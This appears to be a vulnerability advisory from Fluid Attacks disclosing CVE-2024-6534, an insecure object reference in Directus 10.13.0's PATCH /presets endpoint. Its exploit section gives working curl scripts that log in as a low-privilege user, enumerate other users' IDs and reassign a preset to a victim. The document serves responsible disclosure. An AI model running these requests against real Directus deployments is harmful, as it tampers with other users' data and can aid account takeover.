---
slug: advisories/capaldi/
title: Directus 10.13.0 - IDOR
authors: Miguel Gómez
writer: agomez
codename: capaldi
product: Directus 10.13.0
date: 2024-08-14 12:00 COT
cveid: CVE-2024-6534
severity: 4.1
description: Directus 10.13.0 - Insecure object reference via PATCH presets
keywords: Fluid Attacks, Security, Vulnerabilities, Directus, IDOR, Account Takeover, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Directus 10.13.0 - Insecure object reference via PATCH presets"
    code="[Capaldi](https://es.wikipedia.org/wiki/Lewis_Capaldi)"
    product="Directus"
    affected-versions="10.13.0"
    fixed-versions=""
    state="Public"
    release="">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Insecure object reference - Personal information"
    rule="[286. Insecure object reference - Personal information](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-286)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N/E:H/RL:U/RC:C"
    score="4.1"
    available="yes"
    id="[CVE-2024-6534](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6534)">
</vulnerability-table>

## Description

Directus v10.13.0 allows an authenticated external attacker to modify presets
created by the same user to assign them to another user. This is possible
because the application only validates the user parameter in the
`POST /presets` request but not in the PATCH request. When chained with
CVE-2024-6533, it could result in account takeover.

## Vulnerability

This vulnerability occurs because the application only validates the user
parameter in the `POST /presets` request but not in the PATCH request.

### Exploit

To exploit this vulnerability, we need to do the follow steps using a
non-administrative, default role attacker account.

1. Create a preset for a collection.

    Store the preset id, or use it if it already exists from `GET /presets`.
    The following example will use the `direct_users` preset.

    ```bash
    TARGET_HOST="http://localhost:8055"
    ATTACKER_EMAIL="malicious@malicious.com"
    ATTACKER_PASSWORD="123456"
    root_dir=$(dirname $0)
    mkdir "${root_dir}/static"


    curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
        -c "${root_dir}/static/attacker_directus_session_token" \
        -H 'Content-Type: application/json' \
        -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

    attacker_user_id=$(curl -s -k  "${TARGET_HOST}/users/me" \
        -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

    # Store all user's id
    curl -s -k  "${TARGET_HOST}/users" \
        -b "${root_dir}/static/attacker_directus_session_token" |
        jq -r ".data[] | select(.id != \"${attacker_user_id}\")" > "${root_dir}/static/users.json"

    # Choose the victim user id from the previous request
    victim_user_id="4f079119-2478-48c4-bd3a-30fa80c5f265"
    users_preset_id=$(curl -s -k -X 'POST' "${TARGET_HOST}/presets" \
    -H 'Content-Type: application/json' \
    -b "${root_dir}/static/attacker_directus_session_token" \
    --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"{{tittle}}\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"  | jq -r '.data.id')
    ```

2. Modify the presets via `PATCH /presets/{id}`.

    With the malicious configuration and the user ID to which you will assign
    the preset configuration. The user ID can be obtained from `GET /users`.
    The following example modifies the title parameter.

    ```bash
    curl -i -s -k -X 'PATCH' "${TARGET_HOST}/presets/${users_preset_id}" \
        -H 'Content-Type: application/json' \
        -b "${root_dir}/static/attacker_directus_session_token" \
        --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${victim_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"PoC Assign another users presets\",\"subtitle\":\"fakeemail@fake.com\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"
    ```

    Notes:

    Each new preset to a specific collection will have an integer consecutive
    `id` independent of the user who created it.

    The `user` is the user `id` of the victim. The server will not validate that
    we assign a new user to a preset we own.

    The app will use the first `id` preset with the lowest value it finds for a
    specific user and collection. If we control a preset with an `id` lower than
    the current preset `id` to the same collection of the victim user, we can
    attack that victim user, or if the victim has not yet defined a preset for
    that collection, then the preset `id` could be any value we control.
    Otherwise, the attacker user must have permission to modify or create the
    victim presets.

    When the victim visits the views of the modified presets, it will be
    rendered with the new configuration applied.

## Evidence of exploitation

![vulnerability-code-directus](https://res.cloudinary.com/fluid-attacks/image/upload/v1720203072/airs/advisories/directusidor/vulnerability-code-directus.png)

![vulnerability-directus](https://res.cloudinary.com/fluid-attacks/image/upload/v1720203073/airs/advisories/directusidor/vulnerability-directus.png)

<iframe src="https://res.cloudinary.com/fluid-attacks/video/upload/v1720203074/airs/advisories/directusidor/POC-Insecure-object-reference-Directus.mp4"
width="835" height="505" frameborder="0" title="POC-Insecure-object-reference-Directus.mp4"
webkitallowfullscreen mozallowfullscreen allowfullscreen
loading="lazy"></iframe>

![exploit-success-directus](https://res.cloudinary.com/fluid-attacks/image/upload/v1720203072/airs/advisories/directusidor/exploit-success-directus.png)

## Our security policy

We have reserved the ID CVE-2024-6534 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Directus 10.13.0

* Operating System: Any

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Miguel Gómez](https://www.linkedin.com/in/conmagor)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://directus.io/>

## Timeline

<time-lapse
  discovered="2024-07-04"
  contacted="2024-07-15"
  replied="2024-07-16"
  confirmed=""
  patched=""
  disclosure="2024-08-14">
</time-lapse>
